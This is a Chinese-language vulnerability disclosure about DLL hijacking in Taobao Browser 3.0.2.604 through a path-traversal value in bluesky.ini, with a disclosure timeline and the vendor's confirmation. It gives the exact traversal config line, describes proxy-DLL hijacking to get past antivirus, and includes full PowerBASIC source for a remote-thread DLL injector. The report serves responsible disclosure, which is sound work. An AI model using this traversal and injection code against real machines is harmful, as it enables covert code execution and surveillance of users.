2013-06-12: 细节已通知厂商并且等待厂商处理中 2013-06-14: 厂商已经确认,细节仅向厂商公开 2013-06-17: 细节向第三方安全合作伙伴开放 2013-08-08: 细节向核心白帽子及相关领域专家公开 2013-08-18: 细节向普通白帽子公开 2013-08-28: 细节向实习白帽子公开 2013-09-10: 细节向公众公开
淘宝浏览器3.0.2.604(2013.3.20)修改配置文件可能导致本地的DLL注入
家里电脑上的,淘宝浏览器3.0.2.604(2013.3.20)版本,程序启动时会加载框架bluesky.dll,这个文件的路径,程序是通过bluesky.ini来确定的,所以修改配置文件:
\TaoBrowser\bluesky.ini
的内容为
[Common]Version = ../../../../../../../../1111
即会让程序启动时加载(假设安装路径为c:\taobao\)c:\taobao\..\..\..\..\..\..\..\1111\bluesky.dll,也即c:\1111\bluesky.dll。当然不局限于这一个DLL,因为覆盖了这个DLL之后,整个窗体就启动不了了。这个文件夹下面还有很多文件,通过检查与功能之间的关联,也可以通过覆盖某个DLL使得用户执行某个功能时触发恶意木马(例如更新功能的AliUpdate.dll)假设bluesky.dll是恶意木马,那么用户打开淘宝浏览器之后,这个文件就会被浏览器加载,如果杀毒软件并没有它的定义的话,这儿杀毒软件默认是放行的(可能是因为白加黑,家里机器使用的是360杀毒,包括注入也没有提示).DLL注入后将可以监视用户的动作,执行其它危险操作,etc...漏洞的可能利用方法:配置文件的修改者可以是一个会1、释放文件,2、修改配置的木马。这两个动作都很接近正常程序的行为,所以一般不会达到触发杀毒软件主动防御的行为分值。而伪造部分,例如想伪造的是Alixxx.dll,攻击者可以构造一个假的Alixxx.dll,输出表和Alixxx.dll一样,等浏览器调用假的Alixxx.dll时,由于真的也在那儿,假的Alixxx.dll可以调用真的Alixxx.dll的函数并把结果返回给浏览器,同时也可以执行自己的代码
dll被载入TAOBROWSER.EXE
DLL提示的注入窗口:
注入成功(-1=失败,0=成功):
由于是老妈用的机器,所以没装什么编译程序,临时下了个POWERBASIC的程序,代码用的以前写的,所以功能简陋,只是为了测试一下:
#COMPILE DLL#DIM ALL%USEMACROS = 1#INCLUDE "D:\PowerBasic\MAINDIR\WinAPI\Win32API.inc"GLOBAL ghInstance AS DWORD'-- INJECT.INC --------------------------------------------------------------DECLARE FUNCTION Get_hModule(BYVAL PID AS DWORD, DllPath$) AS DWORDDECLARE FUNCTION Inject_DLL(BYVAL PID AS DWORD, DllPath$) AS LONGDECLARE FUNCTION Eject_DLL(BYVAL PID AS DWORD, BYVAL hModule AS DWORD) AS LONG'-- Declares not found in WIN32API.INCDECLARE FUNCTION EnumProcessModules LIB "PSAPI.DLL" ALIAS "EnumProcessModules" _ (BYVAL hProcess AS DWORD, hModule AS DWORD, _ BYVAL cb AS DWORD, cbNeeded AS DWORD) AS DWORDDECLARE FUNCTION GetModuleFileNameEx LIB "PSAPI.DLL" ALIAS "GetModuleFileNameExA" _ (BYVAL hProcess AS DWORD, BYVAL hModule AS DWORD, _ Filename AS ASCIIZ, BYVAL nSize AS DWORD) AS DWORD'====================FUNCTION Get_hModule(BYVAL PID AS DWORD, DllPath$) AS DWORD'-- Returns handle to running module specified in DllPath$, or zero if not found'-- PID = process ID of running process; DllPath$ = path+filename of DLLREGISTER i&, result&LOCAL cb, cbNeeded, nModules AS LONG, hProcess, found, hModules() AS DWORDLOCAL dll$, ModuleName AS ASCIIZ * %MAX_PATHhProcess = OpenProcess(%PROCESS_QUERY_INFORMATION OR %PROCESS_VM_READ, %FALSE, PID)IF hProcess THEN cb = 100 DO REDIM hModules(1 TO cb \ 4) result = EnumProcessModules(hProcess, hModules(1), cb, cbNeeded) IF result = 0 THEN 'call failed cbNeeded = 0 : EXIT DO END IF IF cb > cbNeeded THEN EXIT DO cb = cb * 2 LOOP nModules = cbNeeded \ 4 DLL = UCASE$(DllPath$) FOR i = 1 TO nModules result = GetModuleFileNameEx(hProcess, hModules(i), _ ModuleName, SIZEOF(ModuleName)) IF result THEN IF UCASE$(RTRIM$(ModuleName,$NUL)) = DLL THEN found = hModules(i) : EXIT FOR END IF END IF NEXT i CloseHandle hProcessEND IF 'hProcessFUNCTION = foundEND FUNCTION'====================FUNCTION Inject_DLL(BYVAL PID AS DWORD, DllPath$) AS LONGREGISTER hProcess&, hThread&LOCAL ecode&, pLoadLibraryA, pRemoteBuffer AS DWORDecode = -1 'default to errorhProcess = OpenProcess(%PROCESS_CREATE_THREAD OR %PROCESS_QUERY_INFORMATION OR _ %PROCESS_VM_OPERATION OR %PROCESS_VM_READ OR _ %PROCESS_VM_WRITE, %FALSE, PID)IF hProcess THEN pLoadLibraryA = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA") pRemoteBuffer = VirtualAllocEx(hProcess, BYVAL %NULL, LEN(DllPath$), _ %MEM_COMMIT, %PAGE_READWRITE) IF pRemoteBuffer AND pLoadLibraryA THEN IF WriteProcessMemory(BYVAL hProcess, BYVAL pRemoteBuffer, _ BYVAL STRPTR(DllPath$), LEN(DllPath$), %NULL) THEN hThread = CreateRemoteThread(BYVAL hProcess, BYVAL %NULL, 0&, _ BYVAL pLoadLibraryA, BYVAL pRemoteBuffer, _ 0, %NULL) IF hThread THEN WaitForSingleObject hThread, %INFINITE CloseHandle hThread ecode = 0 END IF END IF VirtualFreeEx hProcess, pRemoteBuffer, 0, %MEM_RELEASE END IF 'pRemoteBuffer AND pLoadLibraryA CloseHandle hProcessEND IF 'hProcessFUNCTION = ecodeEND FUNCTION'====================FUNCTION Eject_DLL(BYVAL PID AS DWORD, BYVAL hModule AS DWORD) AS LONGREGISTER hProcess&, hThread&LOCAL ecode&, pFreeLibrary, pRemoteBuffer AS DWORDecode = -1 'default to errorhProcess = OpenProcess(%PROCESS_CREATE_THREAD OR %PROCESS_QUERY_INFORMATION OR _ %PROCESS_VM_OPERATION OR %PROCESS_VM_READ OR _ %PROCESS_VM_WRITE, %FALSE, PID)IF hProcess THEN pFreeLibrary = GetProcAddress(GetModuleHandle("Kernel32"), "FreeLibrary") IF pFreeLibrary THEN hThread = CreateRemoteThread(BYVAL hProcess, BYVAL %NULL, 0&, _ BYVAL pFreeLibrary, BYVAL hModule, 0, %NULL) IF hThread THEN WaitForSingleObject hThread, %INFINITE CloseHandle hThread ecode = 0 END IF END IF CloseHandle hProcessEND IF 'hProcessFUNCTION = ecodeEND FUNCTION'-- END INJECT.INC ----------------------------------------------------------FUNCTION LIBMAIN (BYVAL hInstance AS LONG, _ BYVAL fwdReason AS LONG, _ BYVAL lpvReserved AS LONG) AS LONG DIM sFileName AS ASCIIZ * 256 DIM sModuleFilePath AS ASCIIZ * %MAX_PATH DIM sNameCut AS ASCIIZ * %MAX_PATH LOCAL ecode&, hmodule, pid AS DWORD LOCAL DllPath$, exepath AS ASCIIZ * %MAX_PATH GetModuleFileName GetModuleHandle(""), exepath, SIZEOF(exepath) DllPath = "D:\PowerBasic\MAINDIR\t2.dll" IF pid = 0 THEN pid = VAL(INPUTBOX$("Enter target process id", DllPath)) IF pid = 0 THEN EXIT FUNCTION hModule = Get_hModule(pid, DllPath) IF hModule THEN MSGBOX "已被注入,尝试清除中",,DllPath ecode = Eject_DLL(pid, hModule) MSGBOX "Final eject ecode:" + STR$(ecode),,DllPath ELSE MSGBOX "未被注入,尝试注入中",,DllPath ecode = Inject_DLL(pid, DllPath) MSGBOX "Final inject ecode:" + STR$(ecode),,DllPath END IF ' SELECT CASE fwdReason ' CASE %DLL_PROCESS_ATTACH ' ghInstance = hInstance ' FUNCTION = 1 'success! GetModuleFileName(hInstance, sFileName, 255) CALL GetModuleFileName( CDWD(&H0), sModuleFilePath, CDWD(%MAX_PATH) ) ' sNameCut = Parse$( sModuleFilePath, "\", ParseCount(sModuleFilePath, "\") ) ' sModuleFilePath = RTrim$( sModuleFilePath, sNameCut ) MSGBOX "The dll" + sFileName + " is being attached into : " + sModuleFilePath 'FUNCTION = 0 'failure! This will prevent the EXE from running.' CASE %DLL_PROCESS_DETACH' FUNCTION = 1 'success!' CASE %DLL_THREAD_ATTACH' FUNCTION = 1 'success!' CASE %DLL_THREAD_DETACH' FUNCTION = 1 'success! ' END SELECTEND FUNCTION
DLL以及设置
过滤好../这种相对路径的字符
危害等级:中
漏洞Rank:5
确认时间:2013-06-14 11:30
感谢你对我们的支持与关注,该问题我们正在修复~ ^_^
暂无